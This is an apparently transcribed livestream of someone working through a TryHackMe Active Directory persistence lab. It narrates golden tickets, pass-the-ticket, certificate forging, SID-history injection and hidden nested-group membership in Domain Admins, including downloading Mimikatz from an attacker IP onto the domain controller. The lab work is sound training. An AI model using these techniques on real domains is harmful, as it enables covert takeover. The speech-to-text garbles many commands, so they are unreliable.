here. And let's go home. Our CA certificate path is not that. Our CA certificate path is going to be C users caret / that. And our new certificate path is going to be C users caret. Let's call this, instead of full admin.pfx, because maybe somebody else already had that. Let's call this caret. Full admin.pfx. Let's do something like that. I wonder if that might have been a problem. Now, medieval. VulnHub is another one that you can use. And VulnHub, you can download the boxes. They are all Linux boxes. Because Windows, like laws and stuff like that. But yeah, VulnHub you can use. And that will, you can download the boxes. So if you have VirtualBox, you download the boxes of VulnHub, thus allowing you to use it on VirtualBox. If you have VMware, you just download the VMware versions or whatever they have for VMware. So if you look at the actual VulnHub virtual machine, and then when you go to download it or whatever, it'll actually tell you if it works on VMware or VirtualBox, if it pulls an IP address, things like that, like DHCP if it's set up for that and everything. So they're all set up for DHCP, or else you're not going to be able to find them. But yeah. Then you just got to build out your own little network in VirtualBox or VMware, whichever one you're using, and you go to there. So our certificate is the one that we just created, right? Which is the caret full admin PFX. All right. That's incorrect, like right there, whatever that is. I need to put a slash in there. Okay, cool. From there, we go into the password, which was password 123, I believe it was. Which is... Yep, password 123. All right, cool. The out file, where do we want to write this to? And the name of the file to write the grant ticket to. So we'll say administrator, or we'll actually say caret.kirby. The domain controller IP address, which is going to be the child domain controller IP address, which is 10.200.93.101. Let's see if this works now. If it doesn't, we're just going to move on to something else. And it doesn't. All right. Try Acme. Your shit's fucked again. Try Acme. I don't know what to tell you. But maybe it wants this one, like right here. I don't see why I would want that one at all. Because we just built another certificate. But hey, you know what? Maybe it wants that one. I don't see why it would, but let's try it. Maybe we need to put both certificates together or something. Yeah, okay. That's not correct. Yep, KDC error, client not trusted. Let's go with, it's going to be Chloe.Potter. Let's go with someone that's on this machine. Even though administrator's on the machine, but let's try her. Okay. You think it should be a fully qualified domain name? We can try that. We're already putting the domain name in there, so we shouldn't need a fully qualified domain name now because it would be za.tryhackme.that. Let's try it. Oh, I think I already tried it without that. So we're already putting the domain name in there. This is what, I mean, literally this is what actually TryHackMe actually has like as like their copy and paste. Just change the password, you know. Literally what they have like right there. We can try 93.100, although that domain controller doesn't seem to have. We have the same problem with that guy. I think that triac is just jacked up again. That's all. Oh, honestly, I think they just fucked up again. Now, I've never done this attack force. It's not even like I'd be like, oh, this is how to work around it. You know what I'm saying? I don't want to do the rest of it now. This is what happened with, what was it? The pivoting persistence one. This is the same exact thing that happened. You know what's funny, though, is that it's almost like we can't do this. Let's see. Can we even do this attack? I remember there was one, I think it was during Holo, and it was like, it said it gave you a whole thing you could do, and that was like, yeah, you can't actually do that. We also didn't get all of this. We only got these tickets right here. We didn't get the domain controller ticket. That's probably our problem like right there is we didn't get the actual domain controller ticket. Even though we already did it, let's do a golden ticket attack again, because maybe we're just not able to get up to it, I'm wondering. Let's do that again. Let's do a... Invoke mimikatz.ps1. We already have the Kerberos Stingray ticket hash and everything like that, so we don't need to do that again. Hey, thanks a lot for the follow, Morpheus. We already have that, so we don't need to do that again, right? So let's go ahead and let's get the Kerberos Stingray ticket again. Let's go ahead and do a invoke mimikatz attack command. We'll do Kerberos golden. All right, /user. It's going to be administrator. Try to fly under the radar here. /krbtgt is going to be our hash up here. /sid is going to be our SID like right here. /domain should be za.try hackme.loc. And that should /path ticket. I think that's it. It'll tell me if it's wrong, if I did something wrong. All right, cool. So we did that. klist.exe. All right, we already have that. Can we go ahead and do a ses equals new PS session into attack computer name? Let's see. We need a domain controller computer first. Ping 10.200.93.101. Damn, sometimes you get something back with that. Okay, it's probably DC. Let's go ahead and locate power view. .ps1. Copy that guy over to here. IEX, IWR, use basic parsing, HTTP. Let's try this like real quick. Let's try to grab it. Let's try to get into the domain controller to do the rest of these things. Let's try to do that. PowerView.ps1. We'll do a get net domain controller. Okay, so it's thmdc.try-hack-me. Sess equals new PS session. Attack computer name is going to be that like right there. Access is denied, but I have a KRB TGT ticket, and I'm also an administrator. Why is it denied? Okay, let's go ahead and do a pass the ticket attack again. Why is he doing a SIP service? Do an HTTP service. That should be for a 7.4 silver ticket right there because we used RC4. Oh, I forgot to put an ID 500. That's what I forgot. Okay. Invoke. So let's go ahead and press up, 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 up. Space ID 500. Let's make sure we got everything real quick. Pretty sure I got everything in there. Pass the ticket, domain, ID 500, SID, KRB, TGT. Don't care about ending, admin, don't care. Domain, okay, let's go ahead and let's try that. Purge the K list. That means we should be able to look at it now. We should have an administrator ticket for the KRB, TGT. We do. Let's try to get a session again. I don't know if we're actually allowed to. We may literally not be allowed to. Okay, so it's not allowing us in the THMDC. Let's go ahead and at least try to do the Rubius stuff again then. Yeah, I was hoping I could just press up. Okay, let's go back into Mimikatz. We may not be able to reach him because we don't have a ticket with him like right now. That's the only thing I can think of. Other than that, this shit just ain't working. Privilege DOI, Crypto CAPI. Okay. That one's not going to work. Let's throw this guy in there. Hey, thanks a lot for the follow, Wicked Blue Ninja. Let's throw this guy in there. Okay. And it's only exporting just those, huh? That's what I'm noticing. System store. Can we get rid of local machine? And just do export? And we'll do the whole domain. I want for the whole domain. Because he's getting all these in there. We are not. So can we do it for a domain? Oh shit! Wicked Blue Ninja, thank you very much. Yo, haven't you already been here? Wait a minute. Morning. Haven't... Should be /DC. Oh. Haven't you been here for a while, Wicked Blue Ninja? I could have sworn that too. When I said it, when I saw it, I was like, thanks for the follow. I was like, oh, okay. And then, hey, thanks for the subscribe, dude. That's freaking awesome. Thank you very much. Let's try for /. Because if we put in this whole thing, right, it says local system. We're not pulling back what we want to pull back for local machine. Can we do system store? Can we do THMDC? Can we do theirs? Like, can we grab the THMDC one? Can we do that? I don't know if this is possible. I have no idea. No. Because we're not getting those off of our local system. Now, there might be something wrong with this thing. Which wouldn't actually be the first time. But we're not pulling those off of our local machine. We're not pulling the same ones that they're pulling. How about that? We should be seeing a lot more search coming through. We're only seeing these two come through. If I do we're only getting the public and private for actually our machine, not the domain controller. We need to get it for the domain controller. You got booted? See, I already tried it on the DC, but we can't get a session with it, with the DC. Now, did they just like log in? They said just log in again. But did they log into the DC? It looks like they, okay, these fuckers logged into the DC. Does it say that anywhere in this thing to do that? Why can't we get a session with it that is just for 5985 just close on everything? Wow. Right here. Use SSH to authenticate THMDC. The last, not the first thing, the last thing in here. Oh, God. Not like bold. Just like really just like hidden in the thing. Like, oh, yeah, do this, by the way. Thanks a lot. I'm sitting like, dude, like this either A doesn't work or we are on the wrong place here. Then I realized we're not even getting the right tickets here. And how are they getting so many tickets? That's why I figured we're going to DC. Yeah, but we already tried to make a session with the DC, then we got nothing. So I guess they got 5985 closed on everything. So, wow. Okay, let's make a directory for Carrot. CD and a Carrot. Let's go ahead and wget. Wow. All right, if you're doing this, it's on the domain controller. PowerShell wget HTTP 1050.92.9/mimikatz.exe. Out file will be mimikatz.exe. All right. There we go. Okay, cool. So let's go ahead and /mimikatz.exe. Privilege debug. Debug. Crypto. Thought that was it. Crypto Cappy. What did I say? Cassie? Yep. Cappy. Crypto Cappy. Okay. Let's go ahead and throw in there the where's the other one at? Crypto Cappy. It should be Crypto CNG, right? Yep, Crypto CNG. Okay, it's okay if we get an error. And that good certificates, boom, boom, export. There we go. Let's go. Okay. We are getting somewhere now. Now we're cruising. Okay. So, we now have all the tickets, right? All certificates, excuse me. Let me go ahead and update my notes with that. There. Forgot to make it red. Control Shift L. Oh, that's not it. Worst idea I've ever had, like right there. Got how to make it a different color. Format. Edit, tools, tree, format, text color. Shift Alt F. Really? Red. Select. Bam. Okay. Awesome. So now we are here. So now we can look at the THMDC PFX file. So now we have to do this part for the THMDC PFX file. There's all of our certificates, like right there. We go ahead and do this. And show it over here. You can actually just probably copy and paste this guy right here. Because that's exactly what we're going to be doing again. Doing the same exact thing again. Oh. Not recognized as a command line. Is there two of them? We gotta go through it twice. Forward cert, forward cert. I'll try having that loc. Okay. C tools, forward cert, C boom boom. Password 123. And we want to do it for the CA cert path is going to be not that one like right there. We actually want to do the, let's delete all of that. We want to do that for the domain controller one. So we go up to the domain controller one and we want the PFX. We want this one like right here. Let's go ahead and copy and paste that down here. And that should now be good. Okay, now that's made that one. Cool. Okay. I'm going to copy that into here. Delete this. Okay. Awesome. Now, we do a DIR. We should have our full admin PFX. Means now we can do the last part of it, which is going to be to call for Rubius. So we're going to ask to user administrator, encapsulation AES-256 certificate, the one that we just made, which is full admin.pfx, right? So we want to put in the full path, I believe. So it's going to be C users caret full admin.pfx. The password, which we made password 123. Whoops, that should say out file. That should be a slash. And our password was password 123. There you go. Out file is going to be, we'll say caret.kirby. And then our domain controller IP address, which is going to be 10.200. 93, I believe is 10.200. We want our child one 10.200.93.101. 93.101. I didn't spell out file correctly. And we're still getting not trusted. Still getting to say that thing again. So that's good. Oh, God. Ugh. What is the Discord link? That's actually a really good question. All right, we're just about done with this box because now we're on domain controller doing it, and still we're not getting anything. How the fuck do you share a Discord link? I don't know. It's the hardest thing I've ever done in my life. Invite people? Do I just send a link? Search for friends or send a server link? Okay, yeah, we just do that. We'll send a server link there. Crushed it. There you go. Alright, so that one's still broke. Even though we did it on the domain controller itself. And we pulled the actual domain controller certificate. So this was just, I feel like it's just jack. I feel like that's not the correct encapsulation type because we did this one, another one like this. And it was like the walkthrough style. And the encapsulation type is actually incorrect. And I don't remember what we did for the encapsulation type. So this one's fucked. Alright. We're done. I feel like, I don't know. I still feel like we can't do it. I feel like if we just keep reading, it's going to be like, oh yeah, you can't do that. Because that's, we had another one that did that one before too. So what key is used to sign certificates to prove their authenticity? The KRV, TGT, TGS? What do you mean? What key? Should be the, DPAPI-CA, right? I believe. What key is used to sign certificates to approve their authenticity? I have no idea. Like private key? Is that what you're asking? What application can we use to forge a certificate if we have a CH certificate and private key? Now, that's actually a really good question because it doesn't work. So, it's actually a super good question. But we think it's either going to be Rubius or no, the forge cert.exe. Is that what it is? I believe it's forge cert.exe that we've been trying to use. What is the mimicast command to pass a ticket from a file with the name of ticket.kirby? Should be Sakurosla pass ticket. Oh god. There we go. Hey, thanks a lot for the follow, Dan Sentil. Thank you very much. So, it should be. Is it Kerberos pass ticket? Yeah, okay. Persistent through SID. I guess we're going back to this. Which machine should we get on this time? How about that? Let's look at the very end. On the domain controller, okay. We'll forge SID history. Okay, so let's go ahead and do that. I don't know, maybe TriAcme doesn't want to work on their box because of how dangerous it is. I don't know. Regarding SIDs, firstly, let's make sure the low privilege dealer is not going to have any information. SID information. Okay, so get AD information, and we're going to use our Chloe.Potter, right? Which we don't believe she actually has any. get AD, get AD domain, right? Or the AD user. Yeah, get AD user. Chloe.potter. Let's go ahead and look at her. We should be able to see she has no SID history, it doesn't look like, right? We could also throw in there SID history, I believe it was. Properties, SID history, and member of. So we can do that again. And I don't believe she has any. Notice she does not. Okay, she has no SID history. Okay. So let's go ahead and do a... There we go. All right, let's keep going here. No. Oh, I was already saying, I was like, huh? All right, this confirms that the user does not currently have any SID history. Yep. Okay, get AD group domain admins. We'll see if they have any, which they do not. Okay. So, but we do get their SID like right there. All right, cool. So we see their SID now too. So now pretty much what I think we're going to try to do. Let's see if this NTDS is actually on this thing, because last one it wasn't on, right? But now we're on the domain controller, so let's try it. It's going to say service not running, watch. Or service doesn't exist. All right, Wicked Blue Ninja, you have a good one. Holy shit, that one worked. All right, cool. So we're going to stop that, right? Thanks for the subscribe also again. Thank you very much. All right. Then we have add history. That's pretty cool. We can just add history to it. In case we'll use DS internal tools to directly patch that. We're just going to add history. And just pretend like that's a thing. Nobody's going to say anything about this. Nobody's going to question this like right here. SID to add to history. I guess we would add the domain admin's ID, I guess. And we're going to do chloe chloe.potter. And I'm going to go with, we're going to add in the domain admin's ID. SID. So it looks like she was on there. Well, we want to delete the history though. So no one knows that we're on there. Let's just try to add some history for her. Let's try to do that first. Okay, let's start that service again. Let's start that service back up. Oh, shit. There we go. Hey, thanks a lot. I'm going to go with meth 1337. Might be math 1337, but thanks a lot. I'm just going to go with meth. I don't know which one it is. Me fourth 1337. Thanks a lot for the follow. All right, so let's go ahead and look at her history again. No, we got to start that service back up again first. So we stopped that service. We got to start service now. Start service. Name. NTDS. Force. I don't think we can force a start. Yeah. Okay, now let's go ahead and look at her history again. Since we just added history to her. And we'll see if that actually worked. And it did. Okay, she has an SID history now. All right. So we added a history to her. And now she has a history. Huh. It's kind of like the history books that we read in school and stuff like that. We just add in history and all of a sudden that's history now. Sometimes we delete history. And it's like, yeah, that never happened. I think it did. Nah. Nope. Alright, let's see here. The user now has history. Alright, cool. Let's keep going here. So what do we want to do with this? Facing the output above, that worked. We were able to forge SID history, grant your low privilege account DA access. Really? No fucking way. No way. Hurts. I want to look at her again. So just because she has history, she doesn't all of a sudden just get that. Her history's gone. Why'd it go away? Oh, probably because they're not looking at her history like right now. Okay. There's no way. Let me see her. I'm going to try RDP as her. If you were RDP into one of the hosts that use the AD users and group snapping, you'd be able to view SID history attribute of the user. However, even the highest possible privileges, you'd be able to remove the attributes that's protected. Okay, let's see if that's actually... Let's see if those are facts. SSH into... how do we even go into? I don't believe them. So you know what? We can figure this out like real quick. IP config. Remina. If so, that's absolutely insane. Yes. Enter username. Chloe.something. Chloe.potter. Marissa 2014. May not be able to get in like that. May have to actually add in a domain. Marissa 2014. And the domain is za.try. Well, the domain is actually, yeah, za.tryhackme.log. Not what I thought. If you were RDP in one of the hosts and used AD users and group snapping. Okay, however, before you can think about removing malicious ID attributes, you need to first find them. None of the regular tools will tell you that something is wrong. The user will not all of a sudden pop up as a member of the domain admin group. So unless you are actively filtering, she's not part of the domain admin group though. We just did it. Let's try. We'll try logging as her somewhere else. We'll SSH in as her somewhere else, and we'll do it like that. Okay. Because she might just not be able to remote desktop in. Although if she just became part of the domain admin group, she should be able to remote desktop in. But let's see. Let's go ahead and we are going to go back to here. We're going to use these credentials to hopefully log in. Or these ones like right here. We're going to use her credentials to log in. And we're going to try to log into the domain controller. Or into here and then just try to do a C drive. Just try to locate or do a, whatever it's called, LS on domain controller. There's no way just because she belonged to that group at one point. That would be insane. We did give her a 500 though, didn't we? She did go from 119 to 500. So if we actually look at her stuff, we did give her a 500 there. Yeah, now she's 512. She may be able to. Come on. Okay. LS. Oh, PowerShell. Sorry, let's copy that command. We'll say PowerShell. PowerShell. She can do that. So she can ls into it now. So that means that an unprivileged user can now ls into it. That's pretty freaking cool. Make sure it doesn't have a session on it, right? It doesn't have WinRM up. Let's try to actually see if we actually log in to make sure with her credentials. THMDC. That's, come on now. She can. What privileges does she have? She is an administrator. Wow. That is pretty freaking cool. That's a new one for me. That's pretty cool. I like that attack. Should do that one more often. All right. What AD object attribute is normally used to specify SIDs from the object's previous domain to allow seamless migration to a new domain? Huh. I don't know. That's good. That's a great question. Waiting for AD migration. The user would have a new SID, but we can't add the exist. We still allow them. Okay, SID is good for migrations as we actually use feature for persistence. Thing is, SID history is not restricted to only clean SIDs. Permissions we know required we have, which is what we're trying to do now. To restart? That would be service restart, right? Oh, service start NTDS. That's exactly what we did. It was service start NTDS. We tried with attack force, that actually didn't work. See, that is wrong. Service start service tech name NTDS. That's what it is. Okay, sorry. There we go. All right, there's that. And what AD object attribute is normally used to specify SIDs from the object's previous domain to allow for seamless? Let's look up seamless. It's a great question. Migration. Okay, the legitimate use of SID is enable. This becomes used for organizations busy performing an AD migration. It allows users to retain access to the original domain while they're migrated to a new one. In the new domain, the user would have a new SID, but we can add the user's existing SID in the SID history, which will still allow them access to resources in the previous domain using their new account. So it's good for migration detection. Okay, so what is it actually called? The security identifiers? Is that what it's saying? Is that what it's asking, like right there? No. What AD object attribute? I don't know. Let's look it up. Oh, if anybody else knows. Nobody knows. Google doesn't know. What AD object attribute? Identifiers? So normally you specify SIDs from the object's previous domain. History attribute on call, it's called SID history. I don't understand. You think it's just SID history, just one, just like that? Okay, thank you. Thank you, Leah. I don't know. SID history is 2 words. I don't know. Persist through group membership. All right. Persist through group membership. This is let's see what we're doing here. Let's see it's type of persistence or allow users to new AD group path. New AD group path, okay. Let's go ahead and read it this time because so far I've been on every machine. We don't have time for the SID histories. We can just add ourselves directly to AD groups for persistence. Yes. It's actually what we did at the beginning. While SID history is a great persistence technique, credential rotation and cleanup can still remove our persistence. In certain cases, it may be better to form persistence by targeting the AD group members or AD groups themselves. Always best for persistence. Privileged groups are monitored more closely for changes than others. Any group that classifies as protected groups, domain admins, enterprise admins receive additional security scrutiny. So if we want to persist through the group membership, we may need to get creative regarding the groups we add our own accounts to for persistence. IT support group can be used. We could always add it to a group that has other privileges. like the IT support group, right? We should, if we were IT support group, we might have backup operators, which means we might be able to change the password for non-administrator accounts, something like that. But we could always do something like that. And we should probably be higher privileges if we're an IT support group and be able to move around the system a little bit easier, something like that. All right, nested groups. Most organizations have a significant amount of recursive groups. The recursive group is a group that is a member of another group. We can think of this as group nesting. It's called privilege creep and all that other crap too. Whenever you have too many, whenever you belong to too many groups, it's privilege creep. What's up? While group nesting helps to organize AD, it does reduce the visibility of effective access. Take our IT support example again. If we query AD for membership of an IT support group, it will respond with a count of 3. However, this count is not really true since it is in 3 groups. To get an idea for effective access, we would now have to enumerate those subgroups as well. But those subgroups can also have subgroups. The question becomes how many layers deep should we enumerate to get the really effective access number? Okay. Leverage this reduced visibility form persistence. Instead of targeting the privileged groups that would provide us with access to the environment, we focused our attention on the subgroups instead. Rather than adding ourselves to a privileged group that would raise an alert, we add ourselves to a subgroup that is not being monitored. Let's simulate this type of persistence in order to allow other users also perform the technique. Make sure to append your username to all the groups that you create. In order to simulate the persistence, we will create some of our own groups. Let's start by creating a new base group that we will hide in. People IT organizational unit. Okay. Let's go ahead and do a should have just made a persistence thing, huh? What SID history? What did we do in the very beginning there? Oh, we did a pass ticket, some of that. That could be, I guess we could always do pass ticket. That really falls underneath persistence. There, do some of that. Okay. Cool. There's a spaghetti there in the server. A spaghetti? What do you mean? I like spaghetti. Okay. So let's go ahead and make a new group. So we have new AD group, path OUIT, OU people. Okay, that looks good. Name, we'll say carrot. Sam account name. Sam account name should be a real person though, right? Let me just say carrot again, whatever. Display name, carrot. Okay, cool. Let's go ahead and grab this. Throw this over here. Yeah. We're just getting lost. Trying to make persistence. And then kicked out of the machine, obviously. That's the next part of it. That's the most, that's the part that you want to do the most, is you get kicked out. Did it get reset again? I'll say it was just reset, so. We have plenty of time on it left. Why is it crazy doing it for PowerShell? I take it, Christy, that you have not seen my... One second. No shame. I'm going to pull it up. I have no shame. No shame at all. Should be attack it directory, right? No, none of those. 1 second. Let me see if I have the attack it directory. This one, like right here. All right, go ahead. If you got 35 minutes and 2 seconds, there you go. All right, hacking with PowerShell, try Acme attack it directory. All right, might just pull it up on the stream and just sit there and walk away. No, just kidding. Let's create another group of the people sales OU. So see that someone followed. See, no, what's up, Bumblebee White Hat? How you doing? With PowerShell? That's what I'm saying. That was with that one was with PowerShell. Like just using only PowerShell, and that's it. Hey, thanks a lot for the follow, Methos2365. Okay, so now we're gonna make an OU sales group. New AD group. Let's create another group in people sales, okay? Let's. We do this a couple more times every time adding the previous group as a member. Jesus. Okay, I'm not gonna do it that far down. So yeah, we're just trying to put ourselves in different groups. That's all we're doing, like right here. Okay. Okay, this is in sales, like right here. So we're just trying to put ourselves in different groups. Hey, thanks a lot for the follow, Gilco. 2JZ, thanks a lot. Holy shit, you doing PowerShell? That was probably a pain in the ass, huh? Yeah, I did not do those with PowerShell. That was probably a huge pain. The real question is, syntax in general, yeah. All right, there we go. So now we're in sales and oh, I put myself in sales again. We're keeping ourselves in sales. There, we're in sales now. Screw it. I'm not going through and doing this 200 different times. Okay. For the last group, let's add that group to the domain admins group. So now we're going to take add AD group, identity domain admins, members, username, and we're just going to do nest group 2, it looks like. We're not going to keep making different groups. That would be absolutely insane. We're not going to make 5 groups. Or just carrot. Okay. There we are. Instantly, your low privilege users now have privileged access to THMDC. Let's verify this by doing that. Okay. Bad news is I put down carrot for everything. And we are supposed to put down our actual user of Chloe.Potter. Other bad news is Chloe.Potter already has access to everything. She's already a domain admin. So we would literally have to get new credentials to do this. So let's get some new credentials because she already is a domain admin because we already gave that to her through the last step before this. So that was kind of dumb. That was a little bit dumb. Huh. Stream went out for a second there. There we go. At least mine did. I don't know if your guys did. And we need some new credentials because we need to get it to somebody else. So, because we could put her in that group, but she's already a domain administrator. We already figured that out with the last one that we went through. So that doesn't really teach us shit, like right there. So let's go ahead and is that Discord? Hello, Discord. Oh, Discord just said that I just came online. 2 hours late, but you know. Did we get some credentials yet? We do. Okay, cool. Let's add this user in for everything. Grace Clark with password 1. Let's add her in with everything, and we'll do it like that. So we're just gonna add just one group here now. We're not gonna add a whole bunch of groups. We're just gonna add Grace Clark into a group here, and let's do it like that because we need someone that's already on this machine most likely, because she needs to be able to log in. So we're just gonna do Grace Clark. Grace Clark. And then Grace Clark up here. Okay, cool. So we did that. So she's in a group now. She's in group 1, right? Let's just go ahead and add Grace Clark, nest group 1 to domain admins. And then we'll get into Grace Clark and see if she's actually able to do an LS on the domain controller there. So we'll say SSH into Grace Clark. And then from here, we will do password 1. And we'll do an ls on //ipconfig 10.200.93.101. C. Oh, I did the same exact thing last time too. PowerShell. Let's copy and paste that command. Because it doesn't. Oh my god. Delete too much. Oh my god. I will get it. We will do it. There. Permissions denied. So no, Grace Clark. You don't get in like that. That's not how that works, Grace Clark. You can always try this. Now, what I'm thinking is that we are already supposed to One thing is that they just wanted us to move administrator all the way down. You know what I'm saying? Because there's no reason that just because she made a group and we nested it with domain admin, all of a sudden she's just domain admin. Doesn't make any sense. So, yep, she is not part of that group. We're trying to put Grace Clark as a domain admin on a group, but we're about 99.9% positive that will not work. I think what they're saying is just to add your own domain administrator into all these different groups. Whoops, that's not it. But yeah, so that we just proved you ain't gonna get that, like right there. Now see, they got administrator down here. And then they have AMO. I think they're just trying to take their own administrator account and move them down. Although they're in Aaron Jones like right now. Supposedly he was able to get into it. Try again. Let's put the slash the wrong way. Look at that. Access denied for Grace Clark. Just like we kind of thought. Damn it, try hack me. I love you. Grace Clark. Come over here. We'll try this one more time, even though we literally see her group like right there. We actually, her SID is not going to work. Then we'll do Grace Clark like right here. Flag group already exists. Okay, so we know she's in a group, and then we put her into the domain admins group, right? We do next group 2 also, I think. I think she was also in 2, wasn't she? Nope, just in 1, that's it. CLARKE, yep, that's group 1. Okay. Maybe we just didn't add her the first time? Yeah. Okay, AD group member. Domain admins. Her group's in there. See, other people have been doing this. Tim Taylor. Now, I think what it's saying is to bring your own user down into these different groups so they can't find them. Which means that no shit, you can do a directory search on try me, you're already a fucking admin. So that's what it's doing like right there. See, instantly your low privileged users now have access to THMDC. Let's verify this by using our SSH term on. No, they do not have access to it. We did it for 2. We didn't do it for 1. Maybe we have to do it for 1 also. Maybe it's not seen because she's not in group 1 maybe. So she's not nested all the way through maybe. I'll go with that. Let's try that. And we'll put Grace Clark here. Let's go ahead and get Grace.Clark. So we just copy and paste. Let's try that like right there. Even though she's in that group 1, We did do a net group 1. Never mind. We did a net group 1. They got it going all the way down to 5. These guys are something else. I like him. He said, fuck it, I ain't going nowhere. Okay. Yeah, we just added nest group 1 to ours. She's obviously in net group 1, like right there. Grace Clark, nest group 1. Domain admins, members, are going to be all the way down. No. You can exit out and go back in just in case. We're already in the DC. Let's go to work 1. Maybe that's what the problem was. Maybe you can't do it on itself. Let's go into WRK1. Hopefully that's what the problem is, because this would be pretty sweet if it worked. If you put them in domain admins, I mean... She's in domain admins. Maybe it's line for SIFs or something? Oh, PowerShell. No. Okay. That was good. So we're done with that. What's to describe AD groups that are members of other AD groups? Was it like group nesting or something like that? What is the command to add new members? THM test the AD group, THM group. That's great. That's a great question. We did that, but so it would be to add new members. It'd be add AD group member, right? So what is the command to add a new member? So it'd be get or add AD group member. Add AD group member. Add AD group member. Boom. To the AD group, THM group. Add AD group member. Then it would have to be the group name, right? Tech identity. Tech identity. THM group. THM user underscore THM group. I think we're going to need quotation marks around that. AD group member, tech identity, THM user, going to THM group. Tech members. Did I ever actually add her to the group member? I think I didn't do that probably right there. Let's try that like right there. We'll do that one next. So she's added to the group. Should make sense that she can do it. Tech members is going to be THM user. Is that what it wants like right there? Let's see. Nope. Okay, so what is the command to add a new group, to add a new member, THM test, to the AD group, THM group? Add AD group member, tag ID, THM test, that's why. Still feel like to the AD group, THM group. Okay, let's go ahead and just try this one like real quick. This part like right here for Claire, whatever her name is. Grace Clark. Let's try this one. Okay. Tech members. We'll do Grace Clark. Grace Clark. Okay, now let's try LS into it. We'll have to log out and log in. We can. Holy shit. Alright, cool. So we got that. So we made a new AD group member, right? And then we added that group member. We added their group into there. And then from there, we added that group member. We add Grace Clark into the group. Okay, there we go. Now I get it. Okay, so we add Grace Clark into that group now. Okay, cool. So let's go ahead and try to figure out this question here. What is the command to add a new member, THM test, to the AD group, THM group? So add group member, tag identity, THM test, underscore THM group, tag members. Actually looks to add a new member, THM test, to the AD group, THM group. I feel like that's what we just did. I feel like that's what we just did, like right there. Yep, tag identity. That should be THM test underscore THM group. Let's see. THM test TEST. No, that's way too big. What does it want? Tag identity THM group? What is it? Tag identity THM group. Is that what it wants to do? Tag members, then the username. So like attack members. THM test underscore THM group. Or does it just want THM test at the end there? That's way too big. Yeah, I just want THM test. Like that. Okay. Woo! Persistence through ATLs and then persist through GPOs. Let's take a break here in a minute. Been going on for a minute now. By a minute, I mean like a minute. It says 23 minutes. It's been like 2 hours, so. Hey, thanks, Frank. Frank always. Hey, take 5. Frank always. Oh, Duke, sorry about that. I didn't see your chat there. My fault. We are doing try hack me persistence in Active Directory. The last box on the Active Directory little thing there. So not the most fun thing in the world, but learn some stuff. It's not bad. Make it 10. Not gonna take 10. Can you do like something where like I give it back somehow? I don't know how to do all that. I'm not that good at this. There, I'll just make you a mod. There you go, Frank. There, Frank. Now you're special. We'll make here. Let's. There we go. Now everyone's a mod. There. Okay. Persistence through ACLs. Let's go and see what this guy's all about. Now you get a sword with your name. Christy, you're a mod now. Now you get a sword with your name. I don't know what that means. I don't know what you do, but that's you get a sword. All right, so sometimes we need more than just persisting in normal AD groups. What if we want to persist to all protected groups simultaneously? It's a good question. We just add an account we control to every single privileged group we can find. The blue team will still be able to perform cleanup or remove our membership in order to ensure a bit better persistence and make the blue team scratch their heads. We should rather inject into templates that generate the default groups. By injecting these templates, even if they remove our membership, we just need to wait until the template refreshes, and we will once again be granted membership. Okay. Hey, anytime. Anytime. You know, who else wants a Deezy? You want a sword? You're getting a sword, Deezy. There you are. You got a sword too, Deezy. Everyone gets a sword. Who else wants a sword? We're gonna come in here one day, everyone's gonna be banned. Someone's gonna go crazy and start banning people. Like, I have a sword. Fuck yeah. Deezy, you get a sword too. There, everyone gets a sword. Alright. Fucking, we'll run around the house afterwards. Pretend they're lightsabers, make noises. And battle it up. In order to deploy our persistence to the admin SD holder, we will use the Microsoft Management Console, MMC, okay, to avoid kicking users out of their RDP sessions. It will be best to RDP into THM Work 1, using your low privilege credentials. Use a run as command to inject the administrator credentials and then execute MMC. Okay. We could do that. We could do that. We're nice people. Let's go ahead and get this guy all the way open again. Free swords. Sexy shooter I've never seen before. You're not going to get a sword yet. Sorry. You need to at least make 5 comments before you get a sword. Let's go ahead and RDP into Marissa or the other one. Grace Clark. I don't know which one, but we'll try Chloe Potter here. Let's try to RDP into here. Her. Devil in the back. Oh. Oh, Devil. Have fun with it. Good luck. We just did that one the other day. So we want to get into 10, 293, 248. And we want the credentials of Chloe Potter. I think. Or we want Grace Clark. I don't know which ones. We'll try Chloe first. Might have to put in the Zada try hack me. .loc for domain. Yes, they are. We realized that the other day when going through it. That some of them are definitely... Well, I mean, you could technically... What we did the other day was the... Remember, I don't know if you were in that one where Metasploit, the suggester, was not able to come up with anything. So we did a system info on it, and we just ran every single thing that we could find for that system info. We found a website that just had tons of stuff on there for all the system infos, right? And we just ran every single thing we could find against that. And it finally worked after like the 30th one. We finally got it. Wasn't really the 30th one, but it was definitely like the 10th one or something like that. But we did still have to use Metasploit to be able to run, you know, we were grabbing it off of Metasploit or whatever else. So, Chloe.Potter. And we'll do za.tryhackme.com. Or .loc. I don't know, just throw juicy potato at it, call it a day. I don't remember if Devil was Windows or Linux, but if it's Windows, throw juicy potato at it. See if that works. But isn't it like 2003? Like a bunch of those boxes were also like 2003 and stuff like that. Oh shit! Someone just followed. Sexy Shooter's now following. Oh man, he really wants a sword. He wants a sword bad. All right, let's go ahead and open up command prompt here. We'll run as for the administrator. I wonder if the credentials are already saved. Think the credentials are saved? Oh, they're not. I don't remember what the administrator's password. Yes, I do. I have it written down. All right. So we are an administrator now, right? Cool. Yeah, we were doing some 2003 machines the other day. Had to figure out how to download something onto a 2003 machine. That was fun. All right. So now we want to open up MMC. Or group policy management, right? All right. Navigate to, okay, once you open that up, view advanced features under Zatra system admin SD holder. Oh, add snap and active directory user groups. Okay. Then we right click on it and do an add snapping. What fucking snap is that? Is it because we didn't run as administrator? I've done snap-ins before. I don't remember it being this difficult. Start run MMC. Yeah, we already did that. We're there. We did that. We ran as administrator also. And that should just be, once you have MMC window, add the user and group snap-in. File, add snap-in. God damn it, try hacking. MMC's running. We have to run it from here. Okay, so we have to run it from there. Okay. There we go. Yeah. Yeah, I couldn't find the users at first. I remember I was like, where are the users? Then I remember like where it was. Active Directory. I believe it's the very first one, is it? No, that's domains of trust. I want users and groups. There we go. We can get rid of that one. That's users and computers. Whoopsie daisy. File, add snap-in. Super user friendly, like right here. Super user friendly. Alright, add snap-in, Active Directory, users and groups. Users and computers. We already have that. Domains of trust. View and manage sites. User computers. Allows for user computers and groups, okay? Make sure to enable advanced features. View advanced features, okay? I hate you, try at me. We like unallow you or anything like that? We just like get rid of you? No? No? Not that easy to delete something? Okay. File, add snap-in. Super user friendly, like right there. Remove him. Advanced. Okay. Okay. Because we open it up as a local user, we're actually not. No. Okay, so since we open up as a local user, we can't do Active Directory users and groups. We have to open it up as a domain user. So I guess the copy and paste, those exact commands did not work for administrator. Why? Because it should have worked. Fuck it. We edit it. Just to make sure to allow advanced use or whatever. View advanced features. Okay, so make 